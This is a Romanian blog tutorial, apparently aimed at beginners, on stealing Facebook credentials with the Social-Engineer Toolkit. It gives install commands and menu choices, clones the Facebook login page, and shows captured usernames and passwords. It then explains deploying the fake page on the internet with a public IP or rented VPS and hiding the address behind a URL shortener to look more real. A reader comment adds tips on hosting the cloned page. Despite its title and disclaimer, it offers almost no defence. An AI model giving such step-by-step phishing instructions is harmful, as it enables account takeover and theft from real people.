Cum se poate sparge un cont de Facebook și cum ne putem apăra de un astfel de atac

Acesta este un tutorial de bază, ce are ca scop consolidarea abilităților tale pe internet, cât și înțelegerea despre cum sunt create paginile web false, dar și cum te poți proteja de astfel de atacuri. Nu folosi aceste informații să ataci contul cuiva, deoarece riști să ai probleme.

Social Engineering Toolkit

Social engineering toolkit, dacă nu ai auzit de el până acum, nu exploatează vulnerabilitățile în mecanismul vreunui serviciu, ci exploatează slăbiciunile umane, cu privire la elementul de securitate. Social-Engineer Toolkit (SET) a fost creat de către fondatorul TrustedSec. Este o unealtă scrisă în Python, ce are ca scop penetrarea și testarea sistemelor de securitate, cu ajutorul ingineriei sociale. SET a fost prezentat la unele dintre cele mai mari conferințe, printre care Blackhat, DerbyCon, Defcon, și ShmooCon. Cu peste două milioane de descărcări, SET este standardul testelor de penetrare cu ajutorul ingineriei sociale, ce are tot suportul unei mari comunități din securitatea IT.

Kali Linux



SET este inclus în sistemul de operare (mai degrabă sistemul de penetrare) Kali Linux. Bineînțeles, poate fi instalat și pe Ubuntu, dacă deschizi terminalul / consola și scrii următoarele comenzi:
 
sudo yum install git
sudo -sH
cd /opt
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd /opt/set
python setup.py install
sudo setoolkit

Se-toolkit

Deschide Kali Linux / Ubuntu, iar în consolă / terminal scrie sudo setoolkit.
O să apară ceva de genul acesta:
 
root@kali:~# se-toolkit
 [-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
 [-] Verifying configuration update…
 [*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
 [*] SET is using the new config, no need to restart

_______________________________
 /   _____/\_   _____/\__    ___/
 \_____  \  |    __)_   |    |
 /        \ |        \  |    |
 /_______  //_______  /  |____|
 \/         \/
 [—]        The Social-Engineer Toolkit (SET)         [—]
 [—]        Created by: David Kennedy (ReL1K)         [—]
 [—]                 Version: 4.3.9                   [—]
 [—]              Codename: ‘Turbulence’              [—]
 [—]         Follow us on Twitter: @trustedsec        [—]
 [—]         Follow me on Twitter: @dave_rel1k        [—]
 [—]       Homepage: https://www.trustedsec.com       [—]
 Welcome to the Social-Engineer Toolkit (SET). The one
 stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit
 The Social-Engineer Toolkit is a product of TrustedSec.
 Visit: https://www.trustedsec.com
 Select from the menu:
 1) Social-Engineering Attacks
 2) Fast-Track Penetration Testing
 3) Third Party Modules
 4) Update the Metasploit Framework
 5) Update the Social-Engineer Toolkit
 6) Update SET configuration
 7) Help, Credits, and About
 99) Exit the Social-Engineer Toolkit
 set>
 Acum apasă următoarele taste și apasă enter.[spacer height=”20px”]
1 [enter] 2 [enter] 3 [enter] Explicație:[spacer height=”20px”]


  • Tasta 1 selectează atacuri ale ingineriei sociale. Lucrul acesta este evident, dacă citim opțiunile de la 1 la 9 (99 pentru a parăsi meniul)
  • Tasta 2 selectează vectorii de atac ai unui website. Nu mai este chiar atât de evident. Modulul acesta reprezintă o metodă unică de atacuri web, ce au ca scop compromiterea victimei.
  • Tasta 3 selectează Credential Harvester (Recoltatorul de date). Metoda Credential Harvester va utiliza clonarea web a unui site ce conține câmpurile cu username și parolă, apoi va ,,recolta” toate informațiile postate pe site.
 Apasă tasta 2 și selectează site cloner.[spacer height=”20px”]
 
Îți găsești ip-ul.[spacer height=”20px”]
Într-un nou terminal scrii comanda ifconfig. Va afișa adresa ipv4, mai exact, ceea ce te interesează.[spacer height=”20px”]
 
Înapoi la se-toolkit[spacer height=”20px”]
Scrii ip-ul la care dorești ca datele să fie trimise. Aceasta va fi adresa ta ip. Având în vedere că acesta este ip-ul tău intern, pagina falsă de facebook va fi accesibilă doar pentru computerele conectate la rețeaua locală. Dacă dorești să ataci conturi aflate în alte rețele, recomandarea mea este un VPS cu Ubuntu Server instalat.

Acum se va cere pagina pe care dorești să o clonezi. Scrie https://www.facebook.com/.[spacer height=”20px”]

set:webattack>2
 [-] Credential harvester will allow you to utilize the clone capabilities within SET
 [-] to harvest credentials or parameters from a website as well as place them into a report
 [-] This option is used for what IP the server will POST to.
 set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
 [-] SET supports both HTTP and HTTPS
 [-] Example: http://www.thisisafakesite.com
 set:webattack> Enter the url to clone:https://www.facebook.com/
 În browser scrii ip-ul tău. Va arăta pagina de login facebook. Introduci orice date dorești și apeși login.[spacer height=”20px”]

Demonstrație live[spacer height=”20px”] Pentru a mă asigura că această demonstrație nu este o repetare la ceea ce știi deja, am decis să clonez pagina de autentificare a celor de la facebook, în locul la homepage. Mai jos se vede și un screenshot.[spacer height=”20px”]

 
Adresa IP este adresa mea internă de la ifconfig. Pagina clonată este https://www.facebook.com/login.php. Acum încerc să văd dacă credential harvester funcționează.[spacer height=”20px”]
 
Mașina virtuală pe care am instalat Kali Linux[spacer height=”20px”]



Adăugând IP-ul în browser îmi arată pagina falsă de autentificare. De asemenea, se-toolkit înregistrează accesarea spunând că ip-ul 192.168.154.133  s-a logat pe data de 26 iulie 2017.
Acum o să introduc niște date în câmpurile de mai sus, date ce vor fi arătate de se-toolkit. Am introdus ca username ,,hackingwithkalilinux” și ca parolă ,,password”. Mai jos arată ce a înregistrat se-toolkit.

POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password [spacer height=”20px”]

Pe host am ca sistem de operare Windows 8

Kali Linux îl am instalat pe o mașină virtuală. Pe sistemul meu de operare o să încerc acum dacă pot să accesez pagina și să văd dacă de pe browserele moderne se poate observa ceva în neregulă cu pagina clonată.
 
[spacer height=”20px”] Am introdus ,,windows” și ,,anotherpassword”. De asemenea, m-am logat pe facebook cu contul personal, iar pagina falsă m-a redirecționat către adevăratul facebook.

POSSIBLE USERNAME FIELD FOUND: email=windows
POSSIBLE PASSWORD FIELD FOUND: pass=anotherpassword

Metoda prezentată este pentru LAN. [spacer height=”20px”]
 Cum se poate da drumul atacului pe internet [spacer height=”20px”]
Pentru a face tehnica aceasta să funcționeze și pe internet, trebuie folosit IP-ul public, nu cel privat, Căutați pe google ,,my IP adress” și o să găsiți site-uri care vă afișează adresa IP. Apoi folosiți-o. Puteți folosi tinyurl sau ceva asemănător, pentru a nu vă afișa IP-ul, și a părea mai real. Pe deasupra, s-ar putea să fiți nevoiți să faceți port forwarding, deoarece routerul vostru s-ar putea să blocheze traficul prin portul 80. Firewall-ul poate reprezenta și el o problemă. Totuși, nu recomand să vă folosiți IP-ul, ci să cumpărați un VPS cu sistem de operare Ubuntu (e doar 5 euro pe lună ceea ce aveți nevoie).
Aceasta este ceea ce eu numesc ,,metoda de bază”. O dată înțeleasă pe deplin, nu mai rămâne decât să vă folosiți imaginația, deoarece vă asigur că oricine, poate să cadă în plasă. Puteți integra pagina falsă într-o aplicație interesantă pentru victimă, într-un site s.a.m.d.
 



0 0 vote
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Zekor YT
Zekor YT
3 years ago

daca ai kali linux merge si cu setoolkit si dupa pui ce e in /var/www/html pe un ftp de webhosting si aia e…